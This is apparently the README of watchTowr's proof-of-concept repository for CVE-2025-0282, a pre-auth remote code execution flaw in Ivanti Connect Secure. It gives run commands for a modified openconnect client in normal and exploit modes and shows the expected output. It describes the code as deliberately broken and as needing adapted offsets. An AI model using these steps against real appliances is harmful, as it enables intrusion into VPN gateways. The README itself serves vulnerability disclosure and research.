CVE-2025-0282

Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

This is purposefully broken in non-trivial ways and will require effort to work as outlined previously in our exploitation technique blogpost.

To understand this vulnerability, you can take a look at our technical write-up.

Exploitation Walkthrough and Techniques - Ivanti Connect Secure RCE (CVE-2025-0282)

The PoC

The code operates in two modes:

1. Normal Mode
2. Exploit Mode

Start by running the code in "Normal" mode. If you encounter a password prompt, it indicates the target is functional. Next, switch to "Exploit" mode. If you see the message "Failed to complete authentication," the target might be vulnerable. Note that the exploit code includes hardcoded addresses and offsets, which you'll need to modify to work with your approved target.

Normal mode expected result:

MODE=normal ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Enter user credentials:
Password:

Exploit mode expected result:

MODE=exploit ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                 __         .__  ___________                    
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
              \/          \/     \/                              


        (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)

          - Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2025-0282]

Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found

Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
    --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Failed to read from TLS/DTLS socket: Error in the pull function.
Failed to complete authentication

 [!] Target might be vulnerable

Exploit authors

This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)

Reference

openconnect project which this code is built upon

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team

• https://labs.watchtowr.com/
• https://x.com/watchtowrcyber